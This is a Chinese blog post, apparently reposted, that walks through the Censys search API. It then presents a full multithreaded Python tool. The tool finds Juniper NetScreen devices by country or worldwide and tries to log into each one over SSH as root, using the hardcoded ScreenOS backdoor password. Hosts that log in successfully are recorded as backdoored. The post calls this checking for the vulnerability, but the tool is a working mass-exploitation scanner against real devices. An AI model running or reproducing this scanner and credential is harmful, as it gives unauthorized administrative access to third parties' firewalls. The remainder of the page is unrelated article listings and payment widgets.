利用Censys批量获取Juniper Netscreen后门

最新推荐文章于 2024-06-13 09:43:43 发布
最新推荐文章于 2024-06-13 09:43:43 发布
阅读量2.7k 收藏 1
点赞数
分类专栏: 杂类


Censys是一款用以搜索联网设备信息的新型搜索引擎,安全专家可以使用它来评估他们实现方案的安全性,而黑客则可以使用它作为前期侦查攻击目标、收集目标信息的强大利器。其功能与十分流行的Shodan十分相似,然而与Shodan相比其优势在于这是一款免费的搜索引擎,最初由密歇根大学的研究人员在10月发行,目前由谷歌提供支持。关于Censys的具体介绍可参考http://www.freebuf.com/news/89285.html

Juniper高级副总裁兼首席信息安全官Bob Worrall称,在最近的内部代码审计过程中发现了两枚漏洞,影响ScreenOS 6.2.0r15—6.2.0r18,6.3.0r12—6.3.0r20版本。其中一个是未授权代码漏洞,可解密VPN流量;另外一个可允许攻击者通过SSH或者telnet远程管理访问设备。Juniper提到这些系统的访问会被记录,密码认证也会成功,但是攻击者可改变或者删除日志条目。关于漏洞具体介绍可参考http://www.freebuf.com/news/90323.html

了解到该漏洞后我尝试着使用Censys搜索可能存在后门的主机并批量进行验证。在完成这项工作之前请先让我带领大家大体了解一下Censys中API的使用方法。

首先,你需要有一个帐号,Censys是免费开放注册的,所以这个应该很简单。注册好后在我们的账户页面可以看到Censys为我们每人分配了一个APIID和一个Secret,另外我们还注意到下面有一个搜索频率的限制,使用API的话每5分钟只能搜索120次,这个问题我们下面再处理。

 打开API页面,我们看到,Censys提供了search、view、report、query、export以及data六种API接口。

在提供的API方法中,我们使用最多的应该就是search了,所以,我大体介绍一下search的使用方法。search接口的请求地址是https://www.censys.io/api/v1/search/?,其中?的地方可以是ipv4、websites或者certificates,分别代表搜索ipv4主机、网站和证书。我们的POST请求应该是一组包含query、page、fields的json数据,其中query指的是相应的搜索语句;page代表返回的页码,Censys总是返回一页的数据,即如果你page设置的5,那么其返回的并不是前5页的数据,而是第5页的数据;fields指的是你希望返回值中包含哪些字段,具体包含哪些字段你可以自己去看一下。

通过上面的介绍我们就可以使用Censys来获取数据了,比如说如果你想获取所有apache的服务器,你可以像下面这样来构造代码:

import sys
import json
import requests
   
API_URL = "https://www.censys.io/api/v1"
UID = "YOUR API ID"
SECRET = "YOUR SECRET"

data = {
    "query":"80.http.get.headers.server: apache", 
    "page":1, 
    "fields":["ip", "location.country"]
}

res = requests.post(API_URL + "/search/ipv4", data=json.dumps(data), auth=(UID, SECRET))
results = res.json()
if res.status_code != 200:
    print "error occurred: %s" % results["error"]
    sys.exit(1)
for result in results["results"]:
    print "%s in %s" % (result["ip"], result["location.country"][0])

当然,上面一段代码只返回了第一页的数据,如果你想获得大量数据可以设置一个page变量循环获取,注意:page要从1开始循环而不是从0哦。当然,这样的话问题就来了,Censys只允许我们每5分钟请求120次,直接遍历的话会出现错误,因此我添加了一个延时器,如果一次请求所用的时间少于2.5秒,我就延时剩余的时间,否则的话就直接进行下一次查询。当然,你或许会有更好的方法来解决这个问题。

介绍完Censys,就应该进入正题了,其实检查设备是否有后门就是看该主机可不可以使用user = “root”,password = “<<< %s(un=’%s’) = %u”登录其SSH。我使用了pexpect模块的pxssh来登录远程SSH,具体代码如下:

def connectSSH(host, user, passwd):
try:
    ssh = pxssh.pxssh()
    ssh.login(host, user, passwd, auto_prompt_reset = False)
    return ssh
except Exception, e:
    print "%s is not vul" % host

其实由于登录后并不是传统的SSH,而是该防火墙的操作终端,因此pxssh会认为并没有登录成功,而是返回超时异常,此时我们检测其返回的before字段如果有Remote Management Console字样就说明该主机存在后门。

整合其所有代码并加入多线程进行优化后,我们就可以实时获取可能存在后门的主机并对其进行检测了,整合后的代码地址:https://github.com/s0m30ne/JuniperBackdoor

from pexpect import pxssh
  from Queue import Queue
  import threading
  import time
  import re
  import sys
  import json
  import requests
  import math
   
  user = "root"
  passwd = "<<< %s(un='%s') = %u"
   
  API_URL = "https://www.censys.io/api/v1"
  UID = "YOUR UID"
  SECRET = "YOUR SECRET"
   
  PAGES = 50
  cur_page = 1
  thread_num = 20
  over_num = 0
  queue = Queue()
   
  ip_OK = open("ip_OK.txt", "w")
   
  class testTarget(threading.Thread):
  def __init__(self):
  threading.Thread.__init__(self)
   
  def run(self):
  global queue
  global ip_OK
  global over_num
  global thread_num
  is_over = False
  while not is_over:
  for i in range(5):
  if not queue.empty():
  ip = queue.get()
  else:
  is_over = True
  over_num += 1
  if over_num == thread_num:
  ip_OK.close()
  sys.exit()
  break
  theSSH = connectSSH(ip, user, passwd)
  if theSSH:
  before = theSSH.before
  try:
  theSSH.logout()
  except:
  pass
  isval = re.search('Remote Management Console', before)
  if isval:
  print "%s is vul" % ip
  ip_OK.write("%s\n" % ip)
  ip_OK.flush()
  else:
  print "%s is not vul" %ip
  time.sleep(1)
   
  def connectSSH(host, user, passwd):
  try:
  ssh = pxssh.pxssh()
  ssh.login(host, user, passwd, auto_prompt_reset = False)
  return ssh
  except Exception, e:
  print "%s is not vul" % host
   
  def getIp(query, page):
  start_time = time.time()
  data = {
  "query":query,
  "page":page,
  "fields":["ip"]
  }
  try:
  res = requests.post(API_URL + "/search/ipv4", data=json.dumps(data), auth=(UID, SECRET))
  except:
  pass
  else:
  try:
  results = res.json()
  except:
  pass
  else:
  if res.status_code != 200:
  print "error occurred: %s" % results["error"]
  sys.exit(1)
  else:
  result_iter = iter(results["results"])
  for result in result_iter:
  queue.put(result["ip"])
   
  def test():
  for i in range(thread_num):
  t = testTarget()
  t.start()
   
  if __name__ == '__main__':
  if len(sys.argv) != 2:
  print """
  usage:
  using python JuniperBackdoor.py [country] to scan the hosts
  in the country you set
 
  using python JuniperBackdoor.py ALL to scan the hole world
  """
  sys.exit()
  else:
  country = sys.argv[1]
  if country == "ALL":
  query = "22.ssh.banner.software_version:NetScreen"
  else:
  query = "22.ssh.banner.software_version:NetScreen AND location.country:%s" % country
  getIp(query, cur_page)
  if not queue.empty():
  test()
  while queue.qsize() > 0:
  if cur_page <= PAGES:
  getIp(query, cur_page)
  cur_page += 1
  time.sleep(0.1)


stonesharp
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
使用shodan/censys API搜索免费的elasticsearch/kibana资源
点火三周的专栏
07-12 5532
文章目录注册shodan并获取API安装shodan注册censys获取API安装censyscensys查询可用elasticsearch资源 记得以前我在elastic社区分享过一个主题《ITDS如何玩转elastic》(这里的ITDS是IT屌丝的意思),里面提到过如何用elasticsearch做数字货币的交易数据分析,回测数据分析等。其中一个问题就是,我们如何把分析结果进行共享。如果我...
cyber搜索引擎
m0_61506558的博客
09-07 417
我们先介绍搜索引擎,在1996年斯坦福大学有做数字图书馆,即把所有的图书数字化,然后你可以在网络的世界里面检索到,直到1998年谷歌诞生,他们通过爬虫技术把所有的网页放置在自己的数据库里面,通过自己独立的算法把内容进行评级,它是主要针对于网页内容。我们接下来需要解决的问题就是如何进行扫描,回想起之前信息收集的ip、CDN、port、CMS......我们用到的工具有。西门子 S7 协议返回一个完全不同的标语,这一次提供了有关固件、其序列号的信息以及描述设备的大量详细数据。那么如何搜索横幅上的其他属性呢?
利用censys查询所需要的信息
永远在千里之外
12-09 3355
1、打开网站https://search.censys.io/2、在输入框数据 services.http.response.headers.location: account.jetbrains.com/fls-auth后点击Search,网站会返回许多地址。3、点击任何一个地址,并查看详情页,确定端口为80的地址状态码为302。4、最后点击Activate按钮即可。
探索网络的魔法钥匙:Censys查询神器
最新发布
gitblog_00063的博客
06-13 310
探索网络的魔法钥匙:Censys查询神器 项目地址:https://gitcode.com/gelim/censys 在这个数字时代,网络安全与信息检索成为不可或缺的技术领域。今天,我们为您带来一个强大的开源工具——Censys Python查询脚本,它如同一盏明灯,照亮了网络空间搜索的深邃之路。 项目介绍 Censys Python查询脚本是一个简洁而高效的命令行工具,旨在通过著名的Censys...
python调用censys的api接口
qq_45212655的博客
03-15 444
Python调用censys的api接口,response = requests.get(url=url, verify=False, timeout=10, auth=(UID, SECRET)),或者api = censys.ipv4.CensysIPv4(api_id=UID, api_secret=Secret)
Censys
weixin_30315905的博客
11-07 778
Censys   Censys持续监控互联网上所有可访问的服务器和设备,以便您可以实时搜索和分析它们,了解你的网络攻击面,发现新的威胁并评估其全球影响。从互联网领先的扫描仪ZMap的创造者来说,我们的使命是通过数据驱动安全。   Censys跟国外的Shodan和国内的ZoomEye类似,可以搜索世界范围内的联网设备。Shodan和ZoomEye是个人用的比较多的两款,当然国内还有傻...
空间搜索引擎:Censys
weixin_45007073的博客
08-12 8565
空间搜索引擎:Censys前言搜索语法查询和180.76.76.0/8 or 14.215.177.0/24中的主机查询位于美国的主机查询没有安装受信任证书的流行网站Github.com的受信任证书 前言 如果有小伙伴用过shodan,那么都清楚shodan是一个基于全网扫描的搜索引擎,它区别于其他搜索引擎。shodan它能搜索到基于隐私的数据,如摄像头,堡垒机等的弱口令。而我们今天要说的是Censys这款搜索引擎,Censys是一个巨大的数据库,里面存储着每个暴露在互联网上的设备信息。 搜索语法 查询和1
Juniper Netscreen ScreenOS NS-204 NS-208
01-28
Juniper Netscreen ScreenOS NS-204 NS-208 ns200.5.4.0r26.0
Juniper netscreen SSG5 SSG20固件ssg5ssg20.6.2.0.r13.0.zip
10-25
**Juniper Netscreen SSG5 SSG20固件更新指南** Juniper Networks的Netscreen SSG5和SSG20系列是企业级防火墙和安全设备,为中小型企业提供全面的安全防护。这些设备的核心在于其固件,它包含了操作系统、安全策略...
Juniper Netscreen SSG140 6.3.0r27固件-2019.4.23发布
10-04
Juniper Netscreen SSG140 6.3.0r27固件-2019.4.23发布,Screen OS,持续更新,富有生命力的设备,更新主要为了解决安全问题,大小和之前几乎没变化。很可能是末代更新了。
Juniper netscreen基础培训 ppt
08-27
1.1Juniper防火墙基础.ppt 1.2Juniper防火系统管理.ppt 1.3Juniper防火墙透明模式.ppt 1.4Juniper防火墙路由模式.ppt 2.1Juniper防火墙基本安全策略.ppt 2.2Juniper防火墙高级安全策略.ppt 2.3Juniper防火墙...
censys:用于查询Censys公共扫描数据库的Python代码
02-03
用于查询Censys公共扫描数据库的Python代码。 该脚本是围绕库censys-python( )编写的,旨在从命令行快速,轻松地进行censys查询。 要求 您需要在创建一个帐户 ,并在得到您的API密钥和密码 重要说明:您的查询将受到限制。 允许的值为0.2令牌/秒(每5分钟的存储桶60.0)。 $ sudo pip install -r requirements.txt 用法 $ censys_io.py --help usage: censys_io.py [-h] [-m MATCH] [-f FILTER] [--count] [-r REPORT] [-B REPORT_BUCKET] [-a ASN] [-c COUNTRY] [-o CERT_ORG] [-i CERT_ISSUER] [-s CERT_HOST] [-S HTTP_SERVER] [-t HTML_TITLE] [-b HTML_BODY] [-T TAGS] [--a
Juniper netscreen ssg5-sh.6.3.0r23备份固件.rar
03-04
1、此系统镜像是从实体机SSG5-SH备份出来的,拿出来供有需要的人士,这版本的VPN功能稳定,正使用中。 2、实体机查看: Product Name: SSG5-Serial ........ Software Version: 6.3.0r23.0, Type: Firewall+VPN ...
censys 数据库地理信息自定义接口(python版)
凌乱小风
06-04 2835
公司内部的ip信息库覆盖面不是很够 导致日志处理的时候ip经常差不到 参考了这些数据库最后选了censys 因为比较权威, 但是没有文档,而且接口不太好用,所以自己写了一个查ip的接口 首先 到官网逛了逛,censys特殊之处在于注册了才能用api 注册以后有Secret,API_ID,在查询时需要用到 百度了一下发现也没什么有用的教程,又看了看官方的介绍以及源码 得到了最初的版本
端口扫描工具 Censys 和 Criminal IP 比较
rxb0513的博客
01-30 669
左边的结果是criminalip.io ,右边是search.censys.io 的结果。我在IP地址扫描开放端口时经常使用的工具是search.censys.io ,因为在这里可以扫描的端口号码最多。而且去年新开的criminalip.io 也可以免费扫描端口,所以两者一起使用。如果还有可以比较的端口扫描工具,请推荐给我。只要是可以免费使用的工具,什么都好。虽然两者都会返还信息,但criminalip.io 扫描的端口更多。在外部扫描端口的工具中,有几种可以免费、在网页上使用的工具。
【渗透神器系列】搜索引擎
weixin_30251829的博客
05-23 852
搜索引擎是我日常工作中用得最多的一款工具,国内常用的搜索引擎包括Baidu,sougou,bing等。但我本篇要纪录的并不是这些常用的搜索引擎,而是信息安全从业人员必备的几款网络搜索引擎。本篇要介绍的搜索引擎包括:Shodan,censys,钟馗之眼,Google,FoFa,Dnsdb等。介绍的内容主要是这几款搜索引擎的一些高级语法,掌握高级语法会让搜索结果更准确。 Google搜索引...
网络空间测绘引擎集合:Zoomeye、fofa、360、shodan、censys、鹰图
qq_45212655的博客
03-16 8462
FOFA是华顺信安推出的一款功能强大的网络空间搜索引擎,能快速帮助用户定位和发现互联网上的目标,是发现全球范围内网络资产的重要来源。Shodan平台不仅可以监控自己的网络,还可以监控整个Internet。检测数据泄漏到云端、网络钓鱼网站、受损数据库等。
探索Censys Python库:全方位网络搜索与数据解析利器
gitblog_00097的博客
04-27 436
探索Censys Python库:全方位网络搜索与数据解析利器 项目地址:https://gitcode.com/censys/censys-python Censys Python 是一个强大的工具,它提供了方便的方式来与Censys API交互,获取并解析大量网络资源的信息。Censys是一个网络搜索引擎,可以定期扫描互联网上的所有公共IP地址,并收集各种服务、证书、开放端口等信息,为安全研究...
Juniper SRX防火墙配置指南:从Netscreen到JUNOS迁移详解
本文是一份关于Juniper SRX防火墙的简明配置手册,主要针对已经熟悉Netscreen防火墙的ScreenOS操作系统的工程师。SRX系列防火墙基于Juniper公司的JUNOS操作系统,这是一种电信级的网络操作系统,特点是转发与控制...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值